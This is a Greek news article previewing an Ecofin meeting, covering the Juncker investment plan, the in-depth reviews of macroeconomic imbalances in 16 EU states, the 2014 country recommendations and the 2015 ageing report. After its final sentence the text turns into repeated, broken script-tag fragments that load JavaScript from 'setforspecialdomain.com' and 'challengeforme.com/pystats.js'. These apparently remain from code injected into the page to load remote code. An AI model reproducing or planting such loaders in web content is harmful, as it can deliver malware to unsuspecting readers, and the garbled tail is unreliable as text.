«Πακέτο Γιούνκερ» και μακροοικονομικές ανισορροπίες στο επίκεντρο του Ecofin

«Πακέτο Γιούνκερ» και μακροοικονομικές ανισορροπίες στο επίκεντρο του Ecofin την αντιμετώπιση των μακροοικονομικών ισορροπιών σε 16 από τα 28 κράτη μέλη της ΕΕ.

Ειδικότερα, το Ecofin θα ενημερωθεί για την πρόοδο των διαπραγματεύσεων του Ευρωπαϊκού Συμβουλίου και του Ευρωπαϊκού Κοινοβουλίου σχετικά με την πρόταση κανονισμού για τη δημιουργία του Ευρωπαϊκού Ταμείου Στρατηγικών Επενδύσεων. Η σύσταση του εν λόγω ταμείου αποτελεί μέρος του επενδυτικού σχεδίου για την Ευρώπη, που είναι κοινώς γνωστό ως «πακέτο Γιούνκερ».

Το Ecofin αναμένεται ακόμη να εγκρίνει συμπεράσματα για τις εμπεριστατωμένες επισκοπήσεις των μακροοικονομικών ανισορροπιών που πραγματοποίησε η Ευρωπαϊκή Επιτροπή σε 16 κράτη μέλη (Βέλγιο, Βουλγαρία, Κροατία, Φινλανδία, Γαλλία, Γερμανία, Ουγγαρία, Ιρλανδία, Ιταλία, Κάτω Χώρες, Πορτογαλία, Ρουμανία, Σλοβενία, Ισπανία, Σουηδία και Βρετανία).

Σύμφωνα με την έκθεση του «μηχανισμού επαγρύπνησης» για το 2015, οι χώρες αυτές αντιμετωπίζουν μακροοικονομικές ανισορροπίες, πράγμα που απαιτεί εμπεριστατωμένες επισκοπήσεις για να προσδιοριστεί η φύση των ανισορροπιών. Η Κύπρος και η Ελλάδα δεν αποτέλεσαν αντικείμενο εμπεριστατωμένων επισκοπήσεων για το 2015.

Οι υπουργοί Οικονομικών της ΕΕ θα συζητήσουν επίσης τον τρόπο με τον οποίο τα κράτη μέλη εφάρμοσαν τις ειδικές ανά χώρα συστάσεις για το 2014, που διατυπώθηκαν στο πλαίσιο του Ευρωπαϊκού Εξαμήνου, της ενωσιακής διαδικασίας συντονισμού της πολιτικής.

Τέλος, το Ecofin αναμένεται να εγκρίνει συμπεράσματα για την έκθεση του 2015 με θέμα τη γήρανση του πληθυσμού. Η συγκεκριμένη έκθεση, που ενημερώνεται κάθε τρία χρόνια, παρέχει μακροπρόθεσμες προβλέψεις του δημοσιονομικού αντίκτυπου της γήρανσης την περίοδο 2013-2060 για τα 28 κράτη μέλη της ΕΕ και τη Νορβηγία.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >